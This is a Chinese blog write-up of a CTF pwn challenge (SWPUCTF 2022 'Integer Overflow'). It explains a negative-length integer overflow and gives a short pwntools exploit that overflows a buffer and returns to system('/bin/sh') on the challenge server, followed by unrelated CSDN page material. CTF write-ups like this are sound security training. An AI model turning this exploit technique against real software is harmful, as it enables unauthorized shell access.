nssctf-[SWPUCTF 2022 新生赛]Integer Overflow

最新推荐文章于 2024-08-16 18:41:12 发布
最新推荐文章于 2024-08-16 18:41:12 发布
阅读量106 收藏
点赞数 2
分类专栏: pwn百题计划 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73818758/article/details/140333750
版权

很简单的一个整数溢出,给了system函数和/bin/sh字符串,构造后门即可,exp如下:

from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node5.anna.nssctf.cn",20085)
elf = ELF('E:\Desktop\pwn百题计划\pwn')
system_addr = 0x80494FB
binsh_addr = 0x804a008

p.sendlineafter("Tell me your choice:",b'1')
p.sendlineafter("First input the length of your name:",b'-1')
payload = b'a' * (0x20+4)  + p32(system_addr)+p32(binsh_addr)
p.sendlineafter("What's u name?",payload)
p.interactive()

Wz0beu-淤青
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
js-integer-sequences:JavaScript的整数序列
02-13
import * as integer from '@aureooms/js-integer' ; let F = new Fibonacci ( integer ) ; list ( map ( integer . stringify , F . range ( 10 ) ) ) ; // 0 1 1 2 3 5 8 13 21 34 孩子们 :JavaScript的斐波那契...
[SWPUCTF 2022 新生]upx
2201_76139143的博客
12-23 469
直接使用虚拟机去壳将每个字符与2异或。
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1504
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
SWPUCTF 2022 新生-WEB部分wp
m0_74606212的博客
09-24 666
SWPUCTF 2022 新生-WEB部分wp
SWPUCTF 2022新生 web部分wp
weixin_44770698的博客
01-16 3897
SWPUCTF 2022新生
SWPUCTF 2022 新生(更新中)
打打CTF
03-25 747
在线练习地址:https://www.nssctf.cn/problem/sheet/14364
signed integer overflow报错解决
热门推荐
weixin_45357271的博客
03-01 1万+
1 + 2147483647 超过了int边界 原来代码: long mid=(low+high)/2; Line 6: Char 30: runtime error: signed integer overflow: 1 + 2147483647 cannot be represented in type ‘int’ (solution.cpp) SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior 修改以后的代码: long mid = (hi
Integer Overflow 整数溢出实验教程.mp4
04-11
MONASH University Integer Overflow实验
long-integer-additions-operations.zip_long-integer
09-19
在“long-integer-additions-operations.zip_long-integer”这个资源中,重点讲述了如何使用双向循环链表和数组来实现长整数的加法运算。下面我们将深入探讨这一主题。 首先,长整数加法运算对于处理大数据计算至关...
A-positive-integer-decomposition-.rar_decomposition_integer fact
07-15
用c语言将一个正整数分解质因数,代码条理非常清晰
Large-integer.rar_ large integer_integer加减乘除_visual c
09-20
标题"Large-integer.rar_large integer_integer加减乘除_visual c"指出,这个压缩包包含了一个使用Visual C++编写的程序,该程序专门设计用于执行大整数的加法、减法、乘法和除法操作。下面我们将深入探讨大整数处理...
【Web】SWPUCTF 2022 新生 个人复现
uuzeray的博客
11-28 710
挑了部分题,太简单的就没选进来(但选进来≠有难度)
SWPUCTF2022 校内道部分 wp
yjprolus的博客
10-26 1394
SWPUCTF2022 wp
2022 SWPU新生&HNCTF web部分题目
weixin_63231007的博客
11-02 3275
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
特洛伊木马:现代网络安全的隐形威胁
最新发布
weixin_48579910的博客
08-16 263
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
H5直播行业的安全挑战:为何害怕黑客攻击?
@云安全小杜
08-13 420
随着移动互联网的快速发展,H5直播因其便捷性和互动性成为众多平台的选择。然而,这种开放性和交互性也带来了安全风险,使得H5直播行业成为了黑客攻击的目标之一。本文将探讨H5直播面临的常见威胁,并提供一些基本的防御措施。
GPS叉车安全管理系统,远程监控管理车辆,保障叉车资产安全
jiuxindianzi的博客
08-16 270
九盾叉车监管系统利用GPS技术实现叉车全面监管,含IC卡指纹认证、无线实时测速、安全带报警器及小程序后台管理,提升安全性、效率及管理水平,降低运营成本。
IDS 与 IPS:网络安全的两道防线
hakksjss的博客
08-16 123
然而,IDS 也存在一定的局限性。它就像是网络世界中的“哨兵”,时刻保持警惕,依据一定的安全策略,分析网络数据包、系统日志等信息,试图发现各种潜在的攻击企图、入侵行为以及异常活动。此外,IPS 的误报率也是一个需要关注的问题,如果错误地拦截了正常的流量,可能会影响业务的正常运行。如果确定为攻击行为,IPS 则根据预先设置的规则和策略,立即阻断相关的流量,防止攻击对网络造成更大的破坏。它串联在网络中,实时分析流经的网络流量,一旦发现与已知攻击模式或异常行为相符的流量,立即采取行动,防止攻击的进一步扩散。
java 集合 2023-01,2023-02,2023-03,2023-04 2023-05,2023-06, 2022-01,2022-02,2022-03,2022-04,2022-05,2022-06 这样的数据变成 2023-01,2022-01,2023-02,2022-02
06-09
List<String> dates = Arrays.asList("2023-01", "2023-02", "2023-03", "2023-04", "2023-05", "2023-06", "2022-01", "2022-02", "2022-03", "2022-04", "2022-05", "2022-06"); Collections.sort(dates, new ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值